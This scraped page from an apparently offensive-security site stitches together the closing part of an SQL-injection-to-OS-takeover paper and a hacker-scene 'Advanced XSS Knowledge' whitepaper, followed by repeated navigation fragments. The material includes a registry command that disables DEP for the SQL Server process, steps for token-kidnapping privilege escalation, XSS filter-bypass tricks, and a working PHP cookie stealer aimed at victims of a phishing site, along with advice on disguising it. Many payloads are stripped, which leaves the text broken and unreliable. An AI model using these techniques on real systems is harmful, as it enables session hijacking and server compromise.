REG ADD “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\AppCompatFlags\Layers” /v “C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe” /t REG_SZ /d DisableNXShowUI /f

Create a bat file which executes the Windows sc executable to restart the Microsoft SQL Server service;

Via batched queries:

Upload the bat files to the Windows temporary files directory;
Execute the bat file to add the key name in the registry;Execute the other bat file to restart the Microsoft SQL Server service;Wait a few seconds for the Microsoft SQL Server service to restart;
Trigger the vulnerability.

Part V Privilege escalation
Metasploit’s Meterpreter comes with an built-in extension that provides the attacker with Windows Access Token Delegation and Impersonation abuse support:incognito[19]developed by Luke Jennings.
This extension allows an attacker, among other features, to enumerate the Delegation Impersonation tokens associated with the current user and to impersonate a spe-Administrator or Local System if the corresponding token handler is within the same thread of the process where meterpreter is running into; incognito does not support token and cific token if the user has any: this leads to a privilege escalation to handles brute-forcing.
Another way to perform a privilege escalation by abusing the Windows Access Token Delegation and Impersonation mechanism consists in using Churrasco.exe[8,9].
Churrasco.exe is a stand-alone command-line Windows executable developed by Cesar Cerrudo which aim is to perform Windows Access Token Kidnapping[7]. This program takes as argument the name of the executable to run: it brute-forces the token handles in the current process from where it is called (e.g. MySQL or Microsoft SQL Server) and it runs the provided command with the brute-forced SYSTEM token,if the process’ user has tokens: this is a privilege escalation because the provided command will run with higher privileges of the database process.
Churrasco.exe can be uploaded to the database server file system and used in the context of the out-of-band connection attack (Part IV) to execute the Metasploit SYSTEM. This Network Service: Microsoft payload stager as can be achieved when the database process runs as SQL Server 2005 and Microsoft SQL Server 2008 often run with this user which has, by design, both tokens.

Part VI Conclusion
This paper explained how to exploit a single vulnerability in a web application at its best to get complete control of the server that runs the database, not only the data stored in the database as usually intended:the SQL injection itself can be considered as a stepping stone to the actual target for this research, which is the complete control of its server: operating system access, file system access and use of the compromised database server as a foothold in the internal network.

All the techniques described in this paper have been implemented in sqlmap[4].sqlmap is an open source automatic SQL injection tool developed in Python by the author of this paper. It can be downloaded from its SourceForge File List page.

12 Acknowledgments

The author thanks Sheherazade Lana for her kindness, Guido Landi for Microsoft SQL Server buffer overflow exploit development and for describing in detail his exploit in this paper, Alessandro Tanasi for technical discussions and constant support,Alberto Revelli for his help on how to best integrate Metasploit in sqlmap, Simone Assumpção and Martin Callingham for peer reviewing this paper and the Black Hat team for the opportunity to present this research at Black Hat Europe 2009 Briefings on April 16, 2009 in Amsterdam.

References

[1] Alessandro Tanasi: SQLi: Writing files to disk under PostgreSQL. December 21, 2008.
[2] Antonin Foller: Custom xp_cmdshell, using shell object.
[3] Bernardo Damele Assumpção Guimarães: Debug scripts from binaries. January 12, 2009.
[4] Bernardo Damele Assumpção Guimarães: sqlmap: automatic SQL injection tool.
[5] Bernardo Damele Assumpção Guimarães: sqlmap subversion repository.
[6] Bernhard Mueller: Microsoft SQL Server sp_replwritetovarbin limited memory
overwrite vulnerability. December 4, 2008.
[7] Cesar Cerrudo: Token Kidnapping
[8] Cesar Cerrudo: Windows 2003 proof of concept exploit for token kidnapping.
[9] Cesar Cerrudo: Windows 2008 proof of concept exploit for token kidnapping.
[10] Core Security Technologies: Microsoft SQL Server sp_replwritetovarbin Remote Heap Overflow Exploit. February 2, 2008.
[11] David Litchfield and others: The Database Hacker’s Handbook sample codes.
[12] Dominique Brezinski: A Weakness in CIFS Authentication.
[13] GNU Project: GCC.
[14] Guido Landi: Microsoft SQL Server “sp_replwritetovarbin()” Heap Overflow exploit. December 17, 2008.
[15] H D Moore: MS08-068: Metasploit and SMB Relay. November 11, 2008.
[16] Immunity Security Inc: Immunity CANVAS Professional.
[17] John F. Reiser: Ultimate Packager for eXecutables. April 27, 2008.
[18] Josh Buchbinder: The SMB Man-in-the-Middle Attack. March 31, 2001.
[19] Luke Jennings: Security Implications of Windows Access Tokens. April 14, 2008.
[20] Marco Ivaldi: Dynamic library for do_system() MySQL UDF. January 18, 2006.
[21] Matt Miller: Metasploit’s Meterpreter. December 26, 2004.
[22] Microsoft: Debug.
[23] Microsoft: Microsoft Visual C++ 2008 Express Edition.
[24] Microsoft:Vulnerability in SMB Could (KB957097). November 11, 2008.
[25] Microsoft:Vulnerability in Microsoft SQL Server Could Allow Remote CodeExecution (KB959420). February 10, 2009.
[26] Microsoft Help and Support: A detailed description of the Data Execution Pre-vention (DEP) feature. September 26, 2006.
[27] Microsoft Help and Support: Converting Binary Data to Hexadecimal String.February 22, 2005.
[28] Microsoft Help and Support: The “Understanding Data Execution Prevention”help topic incorrectly states the default setting for DEP in Windows Server 2003Service Pack 1. October 6, 2006.
[29] Microsoft SQL Server 2000 Books Online: xp_cmdshell().
[30] Microsoft SQL Server 2005 Books Online: xp_cmdshell(). November 2008.
[31] Microsoft SQL Server 2008 Books Online: xp_cmdshell(). February 2009.
[32] Microsoft SQL Server 2008 Books Online: WAITFOR (Transact-SQL). Febru-ary 2009.
[33] Microsoft SQL Server 2008 Books Online:BULK INSERT (Transact-SQL).February 2009.
[34] Microsoft SQL Server 2008 Books Online: xp_cmdshell (Transact-SQL). Febru-ary 2009.
[35] MySQL 4.1 Reference Manual: Changes in MySQL 4.1.25. December 1, 2008.
[36] MySQL 5.0 Reference Manual: Changes in MySQL 5.0.12. September 2, 2005.
[37] MySQL 5.0 Reference Manual: CREATE FUNCTION Syntax.
[38] MySQL 5.0 Reference Manual: Release Notes for MySQL Community Server5.0.67. August 4, 2008.
[39] MySQL 5.1 Reference Manual: Changes in MySQL 5.1.19. May 25, 2007.
[40] MySQL 5.1 Reference Manual: Server System Variables – plugin_dir.
[41] MySQL 5.1 Reference Manual: Adding a New User-Defined Function.
[42] MySQL 5.1 Reference Manual: Miscellaneous Functions: SLEEP().
[43] MySQL 5.1 Reference Manual: Information Functions: BENCHMARK().
[44] MySQL 5.1 Reference Manual: LOAD_FILE() String Function.
[45] MySQL 5.1 Reference Manual: Privileges Provided by MySQL.
[46] MySQL 5.1 Reference Manual: LOAD DATA INFILE Syntax.
[47] MySQL 5.1 Reference Manual: String Functions.
[48] MySQL 5.1 Reference Manual: SELECT Syntax.
[49] MySQL 5.1 Reference Manual: INSERT Syntax.
[50] MySQL 5.1 Reference Manual: UPDATE Syntax.
[51] MySQL 5.1 Reference Manual: CREATE FUNCTION Syntax.
[52] MySQL 6.0 Reference Manual: CREATE FUNCTION Syntax.
[53] MySQL Connector/Net 5.2.
[54] MySQL Connector/OBDC 5.1.
[55] Nico Leidecker: Having Fun With PostgreSQL. June 5, 2007.
[56] Nico Leidecker: pgshell.
[57] Open Web Application Security Project: Guide to SQL Injection. August 2008.
[58] Open Web Application Security Project: OWASP Top Ten – Injection Flaws.July 2007.
[59] Open Web Application Security Project: Testing PostgreSQL.
[60] PostgreSQL 8.3 Manual: Release Notes for PostgreSQL 8.2. December 5, 2005.
[61] PostgreSQL 8.3 Manual: Date/Time Functions and Operators: Delaying Exe-cution.
[62] PostgreSQL 8.3 Manual: Set Returning Functions.
[63] PostgreSQL 8.3 Manual: COPY.
[64] PostgreSQL 8.3 Manual: String Functions and Operators.
[65] PostgreSQL 8.3 Manual: Large Objects.
[66] PostgreSQL 8.3 Manual: Large Objects Server-Side Functions.
[67] PostgreSQL 8.3 Manual: pg_largeobject.
[68] PostgreSQL 8.3 Manual: CREATE.
[69] PostgreSQL 8.3 Manual: INSERT.
[70] PostgreSQL 8.3 Manual: UPDATE.
[71] PostgreSQL 8.3 Manual: Procedural Languages.
[72] PostgreSQL 8.3 Manual: C-Language Functions.
[73] PostgreSQL Npgsql .Net Data Provider.
[74] rain.forest.puppy: NT Web Technology Vulnerabilities. Phrack Magazine Volume8, Issue 54. December 25, 1998.
[75] Roland Bouman: Creating MySQL UDFs with Microsoft Visual C++ Express.September 24, 2007.
[76] The Metasploit Project: Metasploit Framework 3.
[77] The Metasploit Project: Microsoft Windows SMB Relay Code Execution exploit.
[78] The Metasploit Project: Multi-handler exploit.
[79] UDF Repository for MySQL: lib_mysqludf_sys shared library. January 25, 2009.
[80] Wikipedia on Dynamic-link library.
[81] Wikipedia on Shared Object.

Advanced XSS Knowledge

admin — Mon, 10 Jan 2011 10:22:53 +0000

<|-[___________________________________________________________________________]-|>
-                                                                             -
-                          [ Advanced XSS Knowledge ]                         -
-                             written by novaca!ne                            -
-                                                                             -
<|-[___________________________________________________________________________]-|>

# Author: novaca!ne
# Date: 23.03.2010

.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.
Contact: novacaine@no-trace.cc °
Website: www.novacaine.biz      .
°
Artwork by: Vincenzo            .
°
Greetz fly out to:              .
°
Vincenzo, J0hn.X3r, fred777,    .
h0yt3r, Easy Laster, td0s,      °
Lorenz, Montaxx, maoshe, Palme .
and free-hack.com               °
.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.

.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.
Index:                                °
–( I ]> Introduction               .
°
–( II ]> What exactly is XSS ?      .
°
–( III ]> How to execute XSS commands.
°
–( IV ]> Bypass techniques          .
°
–( V ]> What can we do with XSS ? .
°
–( VI ]> How to fix XSS leakages    .
°
–( VII ]> Cheat Sheets               .
°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°.°

<~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
|–( I ]> Introduction
<~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
$ Dear reader, I wrote this Whitepaper to sum up everything I know about XSS.
$ It was written to share knowledge, knowledge should be free and aviable
$ for everyone.
$ You can post and copy this Whitepaper as much as you want, but respect the
$ author’s copyrights.

<~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
|–( II ]> What exactly is XSS ?
<~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
$ “XSS” is a short form for: “Cross Site Scripting” as you can see by the name , XSS
$ deals with scripting. To be more exact: Javascript (in rare cases you can even
$ inject php code). It’s about injecting (almost) every Javascript (and html/css)
$ command/script in a website.
$ XSS flaws comes up everytime a website doesn’t filter the attackers input.
$ In other words:
$ the attacker can inject his malicious script into a website, and the browser just
$ run’s the code or script.

$ There are 3 types of XSS, I’m going to talk about the 2 most used:
$ Reflected XSS Attack:
$ When a attacker inject his malicious script into a searchquery, a searchbox,
$ or the end of an url, it’s called Reflected XSS Attack. It’s like throwing a ball
$ against a wall and receive him back.

$ Stored XSS Attack:
$ Is when an injected XSS script is stored permanent on a website, for example in
$ a guestbook or bulletin board. Stored XSS hit’s everyone who just reaches the
$ site with the malicious code.

$ DOM based XSS:
$ This is a rare used method, perhaps I’m going to write another Whitepaper about
$ DOM based XSS attack.

<~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
|–( III ]> How to execute XSS commads
<~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
$ Actually, injecting a XSS script is very easy. To check if the target website is
$ vulnerable,just look out for a searchbox or something.
$ Let’s say this is how a simple, unsecured searchfunction looks like:

content of index.html

Google

content of google.php

# I’m going to use this script as an example for the rest of this paper #

$ Let’s say this script is stored on a webspace, when I type in:
$ 123
$ then it leads me to the url:

http://site.ru/google.php?search=123

$ and shows me

123

$ But now, let’s try to inject a simple javascript alertmessage :

$ and send it.
$ You can replace “turtles” with any other word you want, and even use ‘ ‘ instead
$ of ” ” for example:

$ But I’m keep using “turtles” as example for the rest of this paper.
$ The target website let’s us know if it’s vulnerable when it prints a popup containing

$ |=========| |======|
$ | turtles | or | 1234 |
$ |=========| |======|

$ Instead of the called code, we can even inject every simple html tags e.g.:

I like turtles

$ and send it.
$ Also, you can paste the code at the end of the url, and visit the site like:

www.site.ru/google.php?search=

$ or

www.site.ru/google.php?search=

I like turtles

# It’s like the attacker is determining the content of the website. #

$ But even if this doesn’t work, there’s no reason to worry: that means the website
$ uses filter techniques to avoid XSS flaws. But there are also ways to
$ bypass those filters. How this works, you’re going to read in the next chapter.

<~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
|–( IV ]> Bypass techniques
<~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
$ There are a lot of ways to bypass XSS filters on websites, I’ll number some:

$ 1.) magic_quotes_gpc=ON bypass
$ 2.) HEX encoding
$ 3.) Obfuscation
$ 4.) Trying around

$ 1.) magic_quotes_gpc=ON is a php setting (php.ini).
$     It causes that every ‘ (single-quote), ” (double quote) and \ (backslash)
$     are escaped with a backslash automatically. It’s also a wellknown method
$     to avoid XSS flaws, although it’s exploitable.

$ How to bypass it when it’s ON? – use the javascript function called
$ String.fromCharCode(), just convert your text in decimal characters
$ (e.g. here: http://www.asciizeichen.de/tabelle.html) and put them in the handling.

$ Using “turtles” (without quote sign) will look like this:

String.fromCharCode(116, 117, 114, 116, 108, 101, 115)

$ now insert this in your alert script:

www.site.ru/google.php?search=

$ What happened? – this function converts decimal characters to ascii characters,
$ so the script tells encodet: “turtles” and decodes it in one step,
$ bit complicated, but useful to evade XSS filters.

$ 2.) HEX encoding is a useful bypass method, too. Using this step will encode
$ your script, so you can’t see what the code will cause.
$ This is how

$ looks like encrypted in HEX:

www.site.ru/google.php?search=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%2F%74%75%72%74%6C%65%73%2F%29%3B%3C%2F%73%63%72%69%70%74%3E

$ (note: i used “/turtles/” (without quote sign) because just “turtles” didn’t work).

$ 3.) Obfuscation – sometimes website administrator simply put words like
$     “script”,”alert()”,””” on the “badwords list”, that means, when you
$     search for “script” on the website, it just shows you an error, like
$     “you are not allowed to search for this word” or something.
$     but this is a weak protection, you can bypass it using obfuscation.
$     your javascript code like:

$ There are like unlimited possibilities, but that leads us to the
$ next chapter…

$ 4.) Trying around: sometimes you just got to try around, because every website
$     is secured/unsecured in a different, unique way. Some doesn’t even use
$     cookies for example. Alway’s keep a look at the website’s sourcecode!
$     Sometimes you need to adjust your XSS script, like:

“>

$ This you need sometimes if you injected your code into a searchbox e.g. and
$ interrupt a html tag, so you first need to close him, then start a new
$ tag (

$ or

www.site.ru/google.php?search=

$ 4.) Cookie stealing: One of the feared things in XSS flaws is the cookie stealing
$ attack. In this method you need to do following:

$ Place this cookiestealer.php in your hoster, and then inject a javascript
$ with your cookiestealer script embedded on your target website.

content of cookiestealer.php (found it somewhere with google)

$cookie = $HTTP_GET_VARS["cookie"];
$file = fopen(‘log.txt’, ‘a’);
fwrite($file, $cookie . “nn”);
fclose($file);
?>

$ Save it as cookiestealer.php and create a ‘log.txt’ and upload both files
$ on your own webspace, in the same directory and set “chmod 777″.

$ Inject the following code in your target website:

http://www.site.ru/google.php?search=

$ Then the victim’s cookie (target’s website user who visited the url above) should
$ appear in the log.txt.
$ Now you simply need to insert the cookie (with e.g. live http headers firefox addon)
$ and use it.

$ Obviously you need to replace

http://www.yourphishingsite.ru

$ With the url of your phishingsite.

# PROTIP: rename your ‘cookiestealer.php’ to something like ‘turtles.php’, #
# this looks less suspicous. #

<~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
|–( VI ]> How to fix XSS leakages
<~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
$ XSS flaws can be very dangerous for your website, even though you can easily
$ secure your own website using the following functions.

##########################################################
#                                                        #
# htmlspecialchars()                                     #
# http://php.net/manual/de/function.htmlspecialchars.php #
#                                                        #
##########################################################

Example usage:

google.php:

$ OR

##########################################################
#                                                        #
# htmlentities()                                         #
# http://php.net/manual/de/function.htmlentities.php     #
#                                                        #
##########################################################

Example usage:

google.php:

$ What happened? – the function simply replaced every specialchar to a harmless html char.
$ For example when I enter

$ it appears

$ But without any popup, because the <,>,’,”
$ turned into <,>,’,”
$ The attackers input has become a harmless, unexecutable html code.

<~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
|–( VII ]> Cheat Sheets
<~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
$ Here is the XSS cheat sheet, where I got most of them from http://ha.ckers.org/xss.html.
$ Enjoy.

”;!–”=&{()}

”>

ascript:alert(‘XSS’);”>

END OF FILE

Hol dir das Gratis-Geschenkpaket von Windows 7 für deinen PC ab!

# hack0wn.com [2010-03-28]

0x50sec.org » 渗透测试

False SQL Injection and Advanced Blind SQL Injection

ID
”;
echo “PASS

”.”Login sucess”.”

”.”Hello, “.””;
echo “”.$row[id].”

wh1ant”;
echo “ site for blind SQL injection test

num: ”.$info[0].”

LFI WITH PHPINFO() ASSISTANCE

Blind Sql Injection with Regular Expressions Attack

用.htaccess做更隐蔽的后门

Backdoor on Pam module pam_unix.so

Guidebook On Cross Site Scripting

Faster Blind MySQL Injection Using Bit Shifting

关于boblog任意变量覆盖漏洞的利用

Advanced SQL injection to operating system full control

Advanced XSS Knowledge

I like turtles

I like turtles

0x50sec.org » 渗透测试

False SQL Injection and Advanced Blind SQL Injection

ID ”; echo “PASS

”.”Login sucess”.”

”.”Hello, “.””; echo “”.$row[id].”

wh1ant”; echo “ site for blind SQL injection test

num: ”.$info[0].”

LFI WITH PHPINFO() ASSISTANCE

Blind Sql Injection with Regular Expressions Attack

用.htaccess做更隐蔽的后门

Backdoor on Pam module pam_unix.so

Guidebook On Cross Site Scripting

Faster Blind MySQL Injection Using Bit Shifting

关于boblog任意变量覆盖漏洞的利用

Advanced SQL injection to operating system full control

Advanced XSS Knowledge

I like turtles

I like turtles

ID
”;
echo “PASS

”.”Hello, “.””;
echo “”.$row[id].”

wh1ant”;
echo “ site for blind SQL injection test